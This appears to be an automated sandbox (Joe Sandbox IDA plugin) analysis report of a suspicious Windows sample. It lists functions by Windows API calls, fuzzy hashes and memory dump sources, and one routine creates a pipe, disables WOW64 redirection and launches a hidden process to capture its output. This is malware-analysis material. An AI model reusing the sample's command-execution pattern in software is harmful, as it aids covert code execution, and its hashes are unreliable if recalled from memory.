                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                • String ID:
                                                                • API String ID: 1272433827-0
                                                                • Opcode ID: 7e70e9bfab7e519fa70e5f67901334a487129d9f498ebe7255dbab0d68b7bbe7
                                                                • Instruction ID: 77137f9cce521eba27c14cff3fbc2fffd786b0d03341de36201aea9639d3924c
                                                                • Opcode Fuzzy Hash: 7e70e9bfab7e519fa70e5f67901334a487129d9f498ebe7255dbab0d68b7bbe7
                                                                • Instruction Fuzzy Hash: B8F04936A00244EFD716DF98E842BDE77F0EB49720F10852AF411EF2A0CBB559408F45
                                                                APIs
                                                                  • Part of subcall function 003171C0: GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
                                                                  • Part of subcall function 003171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263
                                                                • EnumSystemLocalesW.KERNEL32(00322711,00000001,00000000,?,?,00322F79,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 003227EF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                • String ID:
                                                                • API String ID: 2417226690-0
                                                                • Opcode ID: 069c08b43abf1d6b67cd263b186a71587a1616653abc157ff089d4a0626c6425
                                                                • Instruction ID: 18b87206e736cb61f2c01d7486506b92faef74f8cfb1002734ee075554479ba6
                                                                • Opcode Fuzzy Hash: 069c08b43abf1d6b67cd263b186a71587a1616653abc157ff089d4a0626c6425
                                                                • Instruction Fuzzy Hash: 0DF0E53A30421567CB06AF39EC456ABBFA4EFC2B10F1B4059EE058B691CA719882D790
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0002AA04,0030A51B), ref: 0030A9FD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: 4444933a151d73219f5c5645247a9b2e9ff483ff5eefd34310964ea39730886a
                                                                • Instruction ID: 8086c81738ec960429ceec4db05bf4a69b08d58d6606328c0e14d9c77058a7ad
                                                                • Opcode Fuzzy Hash: 4444933a151d73219f5c5645247a9b2e9ff483ff5eefd34310964ea39730886a
                                                                • Instruction Fuzzy Hash:
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0
                                                                • API String ID: 0-4108050209
                                                                • Opcode ID: e95a2fa80e74959b2b2ea43d4c42b3595dc8b2ab61d35824eb6c17c18f79c8ea
                                                                • Instruction ID: b818ab74ba8d10382994b5d44201b3a9a97940976d4a0f655c13afa4903b922b
                                                                • Opcode Fuzzy Hash: e95a2fa80e74959b2b2ea43d4c42b3595dc8b2ab61d35824eb6c17c18f79c8ea
                                                                • Instruction Fuzzy Hash: 4751693160364A5EDB3F9A2CC8B57BE6789AB07700F15043EE582DBEE3C651DD85C292
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: y2
                                                                • API String ID: 0-3524986787
                                                                • Opcode ID: bbac612a5956678d72b0eeffa43674c27943b8e6f5dfd36f8259fd5efe5515da
                                                                • Instruction ID: 47aaaed0b256de6897cdecf5295b68941c6fa8d43e87a81beb5bbbb38b919569
                                                                • Opcode Fuzzy Hash: bbac612a5956678d72b0eeffa43674c27943b8e6f5dfd36f8259fd5efe5515da
                                                                • Instruction Fuzzy Hash: 4821B373F204394B7B0CC47E8C572BDB6E1C68C601745823EF8A6EA2C1D968D917E2E4
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: HeapProcess
                                                                • String ID:
                                                                • API String ID: 54951025-0
                                                                • Opcode ID: e8a53bbcca13e8ee16f2d48ac1919b16804c2c7b0613f477f923fe396cec886d
                                                                • Instruction ID: 628c6d8eeada82f5a2612787204bd845549266ed9f3f0213e10364f84991ab8e
                                                                • Opcode Fuzzy Hash: e8a53bbcca13e8ee16f2d48ac1919b16804c2c7b0613f477f923fe396cec886d
                                                                • Instruction Fuzzy Hash: 54A01138A002808F83028F38AA8838A3AACAA02380F08002AA008C8020EA2080808B02
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 30e23262826ee13cb3ccbd78b9b01c1d6886998cf872e131bc92bb1d8a589e07
                                                                • Instruction ID: fd6d0f791fef263b4c0d0dbd99f189ed988e909848d0f14997f22e6bf1810d75
                                                                • Opcode Fuzzy Hash: 30e23262826ee13cb3ccbd78b9b01c1d6886998cf872e131bc92bb1d8a589e07
                                                                • Instruction Fuzzy Hash: 04224EB7F515144BDB0CCA9DDCA27EDB2E3AFD8314B0E803DA40AE3345EA79D9158644
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f8b1a0d6af95849f3bd67146f200d0fe42e46dc79d205a78ddee3171d4646954
                                                                • Instruction ID: 177d049c0a3beaee7762517f56ebe70479afe51d5674a20ede845901dbea1f49
                                                                • Opcode Fuzzy Hash: f8b1a0d6af95849f3bd67146f200d0fe42e46dc79d205a78ddee3171d4646954
                                                                • Instruction Fuzzy Hash: 20320422D29F054DD7279638D862335A28DAFBB3D4F15D727F81AB5AA9EF29C4C34100
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9b34ed583b49176a5ed86d1d694c3cd736d73cd940357b96ee17f4e6dacdacd0
                                                                • Instruction ID: 7a28b72e265cfdbf9fb046c43d2a64f21d94b158b6c3e4321089e5c7cd30ef63
                                                                • Opcode Fuzzy Hash: 9b34ed583b49176a5ed86d1d694c3cd736d73cd940357b96ee17f4e6dacdacd0
                                                                • Instruction Fuzzy Hash: 2E11A733F30C255B675C81698C1727A96D6DBD824075F533AD826EB2C4E994DE13D290
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                • Instruction ID: 5bcc983492f1bfa97e950867d3615a192b3e4915121a48a077cb9926da5d058e
                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                • Instruction Fuzzy Hash: 1211EE7720304243F61AC66ED5F46B6F79EEBC532172E437AD0434BBD8DB22D9459500
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6847a3e9a0d7b7b8402b77278032b4f626891dfa6fd65570ac05521b0549e8d7
                                                                • Instruction ID: ab23febb306108635e4bc19bc7a04c12f4af56af3ffdbdb69dcbe2bb53c860e8
                                                                • Opcode Fuzzy Hash: 6847a3e9a0d7b7b8402b77278032b4f626891dfa6fd65570ac05521b0549e8d7
                                                                • Instruction Fuzzy Hash: 50E08C72911228EBCB1ADBCCC905D8AF3ECEB49B04B114496F501D7280C670DF40C7E0
                                                                APIs
                                                                • GetTempPathA.KERNEL32(00000080,?), ref: 002E832D
                                                                • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 002E8403
                                                                • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 002E8415
                                                                • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 002E8459
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000044,?), ref: 002E8481
                                                                • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 002E848F
                                                                • WaitForSingleObject.KERNEL32(?,00000064), ref: 002E84B8
                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 002E84DA
                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 002E84FE
                                                                • ReadFile.KERNEL32(00000000,?,0000007F,00000000,00000000), ref: 002E8525
                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 002E856A
                                                                • CloseHandle.KERNEL32(?), ref: 002E8581
                                                                • CloseHandle.KERNEL32(?), ref: 002E8589
                                                                • CloseHandle.KERNEL32(00000000), ref: 002E8591
                                                                • CloseHandle.KERNEL32(00000000), ref: 002E8599
                                                                • GetLastError.KERNEL32 ref: 002E85A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: Handle$ClosePipeWow64$NamedPeek$CreateRedirection$DisableErrorFileInformationLastObjectPathProcessReadRevertSingleTempWait
                                                                • String ID: D
                                                                • API String ID: 3215130363-2746444292
                                                                • Opcode ID: 685674da445ccf81d7b0b2a875e590bf5670772aa4cc12eca7f5a1426546ba25
                                                                • Instruction ID: e1290ac4d5923aa4012a1310f866978955c3701e5b8e1e6941cd69f9272efd6a
                                                                • Opcode Fuzzy Hash: 685674da445ccf81d7b0b2a875e590bf5670772aa4cc12eca7f5a1426546ba25
                                                                • Instruction Fuzzy Hash: EDA19F71951269ABEF25DF20CC46FDDB778AF04700F5041E5EA09AA1D0DB75AE84CFA0
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: _free$Info
                                                                • String ID: P=3
                                                                • API String ID: 2509303402-1187372554
                                                                • Opcode ID: 7ea82192193110c315a650e01958dfe0a1f6c5f38181eaa6bcef4db77c73cd9f
                                                                • Instruction ID: adf9ca1fa439a966e1db31bb0b1ee4ccc92ed10f7e821cd483808fa2d0da80c1
                                                                • Opcode Fuzzy Hash: 7ea82192193110c315a650e01958dfe0a1f6c5f38181eaa6bcef4db77c73cd9f
                                                                • Instruction Fuzzy Hash: D7D19171D002459FDB16DFA8C881BEEBBF5FF4D310F144529E495AB242DB70A986CB60
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: _free$___from_strstr_to_strchr
                                                                • String ID:
                                                                • API String ID: 3409252457-0
                                                                • Opcode ID: a6455b5c1215ed96258e337412d84fc165569b87c5875aee37e91fa1b9c3f292
                                                                • Instruction ID: 3b29f5053f4ea0181b6b8cbf7858b3d9d73cd51be032f5b029f959231d33e10e
                                                                • Opcode Fuzzy Hash: a6455b5c1215ed96258e337412d84fc165569b87c5875aee37e91fa1b9c3f292
                                                                • Instruction Fuzzy Hash: A0D10B719003259FDB2BAF78AC81AAE77E8EF45320F16416DF9409B293EB31D944CB51
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: @b4$@b4
                                                                • API String ID: 269201875-3780071977
                                                                • Opcode ID: 6da6fa9f9dd445897e4c9ca30e82234eab85d4ddf646d5d2d96afba7bf0dcf10
                                                                • Instruction ID: ce3d06827500d458205855e3ca296bd46f1fba2b525b8a87293e8d75fa15dc13
                                                                • Opcode Fuzzy Hash: 6da6fa9f9dd445897e4c9ca30e82234eab85d4ddf646d5d2d96afba7bf0dcf10
                                                                • Instruction Fuzzy Hash: 63C18472D40214BFDB25DBA8CC83FEE77F9AB49B10F550065FA04FB282D670A9809764
                                                                APIs
                                                                • ___free_lconv_mon.LIBCMT ref: 00321B41
                                                                  • Part of subcall function 00320DF7: _free.LIBCMT ref: 00320E14
                                                                  • Part of subcall function 00320DF7: _free.LIBCMT ref: 00320E26
                                                                  • Part of subcall function 00320DF7: _free.LIBCMT ref: 00320E38
                                                                  • Part of subcall function 00320DF7: _free.LIBCMT ref: 00320E4A
                                                                  • Part of subcall function 00320DF7: _free.LIBCMT ref: 00320E5C
                                                                  • Part of subcall function 00320DF7: _free.LIBCMT ref: 00320E6E
                                                                  • Part of subcall function 00320DF7: _free.LIBCMT ref: 00320E80
                                                                  • Part of subcall function 00320DF7: _free.LIBCMT ref: 00320E92
                                                                  • Part of subcall function 00320DF7: _free.LIBCMT ref: 00320EA4
                                                                  • Part of subcall function 00320DF7: _free.LIBCMT ref: 00320EB6
                                                                  • Part of subcall function 00320DF7: _free.LIBCMT ref: 00320EC8
                                                                  • Part of subcall function 00320DF7: _free.LIBCMT ref: 00320EDA
                                                                  • Part of subcall function 00320DF7: _free.LIBCMT ref: 00320EEC
                                                                • _free.LIBCMT ref: 00321B36
                                                                  • Part of subcall function 003185A6: HeapFree.KERNEL32(00000000,00000000,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?), ref: 003185BC
                                                                  • Part of subcall function 003185A6: GetLastError.KERNEL32(?,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?,?), ref: 003185CE
                                                                • _free.LIBCMT ref: 00321B58
                                                                • _free.LIBCMT ref: 00321B6D
                                                                • _free.LIBCMT ref: 00321B78
                                                                • _free.LIBCMT ref: 00321B9A
                                                                • _free.LIBCMT ref: 00321BAD
                                                                • _free.LIBCMT ref: 00321BBB
                                                                • _free.LIBCMT ref: 00321BC6
                                                                • _free.LIBCMT ref: 00321BFE
                                                                • _free.LIBCMT ref: 00321C05
                                                                • _free.LIBCMT ref: 00321C22
                                                                • _free.LIBCMT ref: 00321C3A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                • String ID: @b4
                                                                • API String ID: 161543041-4188318018
                                                                • Opcode ID: 8df92338b9c38cd252ca0e2bbd9de4fdf709d8897ffc98dabcb187c7f989ce66
                                                                • Instruction ID: 91d6732dc4d406a4b2d1f3c32fb51716f064486a48108a32ff40952fbbfa7ff0
                                                                • Opcode Fuzzy Hash: 8df92338b9c38cd252ca0e2bbd9de4fdf709d8897ffc98dabcb187c7f989ce66
                                                                • Instruction Fuzzy Hash: D7316D326003109FEB36AB38EE45F96B3EAEF65350F115829E055EB151EF30ED808724
                                                                APIs
                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00348FA8,00000FA0,?,?,00309DC8), ref: 00309DF6
                                                                • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00309DC8), ref: 00309E01
                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00309DC8), ref: 00309E12
                                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00309E24
                                                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00309E32
                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00309DC8), ref: 00309E55
                                                                • DeleteCriticalSection.KERNEL32(00348FA8,00000007,?,?,00309DC8), ref: 00309E71
                                                                • CloseHandle.KERNEL32(00000000,?,?,00309DC8), ref: 00309E81
                                                                Strings
                                                                • kernel32.dll, xrefs: 00309E0D
                                                                • WakeAllConditionVariable, xrefs: 00309E2A
                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00309DFC
                                                                • SleepConditionVariableCS, xrefs: 00309E1E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                • API String ID: 2565136772-3242537097
                                                                • Opcode ID: 3a66881445bd398df09413c9b8497fb2b70a0d894052bd8e53d6215a961125fc
                                                                • Instruction ID: 9c2620a802b7f615df516dcc72874952e6ebdb387bb58b560473fcec3c58e48c
                                                                • Opcode Fuzzy Hash: 3a66881445bd398df09413c9b8497fb2b70a0d894052bd8e53d6215a961125fc
                                                                • Instruction Fuzzy Hash: B301BC35646301ABDB239B74BC59BAB3AADFB85B91F050816F800DA2D4DFB0CC00C660
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                                                                • String ID: `&0$/.
                                                                • API String ID: 3943753294-1576290954
                                                                • Opcode ID: 512af28e5612b0276ac81c89e49595802c9b720124835ca8bb66b3b7df22dd76
                                                                • Instruction ID: 2b309c5f71664c283fc0d0a2b6c90be6d2686a771fadbcf1a7ee6145f7e4dfe5
                                                                • Opcode Fuzzy Hash: 512af28e5612b0276ac81c89e49595802c9b720124835ca8bb66b3b7df22dd76
                                                                • Instruction Fuzzy Hash: 9B516E35A0120ADFCF12DF58C9E56A9B7BCEF09710B26895BD806AB2D6D730ED40CB50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3907804496
                                                                • Opcode ID: d89f4b44618c507ead4e31a80b960cb56bc3d7f143682a5edd45a1495864240b
                                                                • Instruction ID: e5bd69292bb3f81ae4e70499392720792a7ae4a9232bb8fc85b8fe9101bdda68
                                                                • Opcode Fuzzy Hash: d89f4b44618c507ead4e31a80b960cb56bc3d7f143682a5edd45a1495864240b
                                                                • Instruction Fuzzy Hash: 3AC1D170A042059FDB1BDFA8C881BEEBBB8BF4D310F154059F944AB392CB359981CB61
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
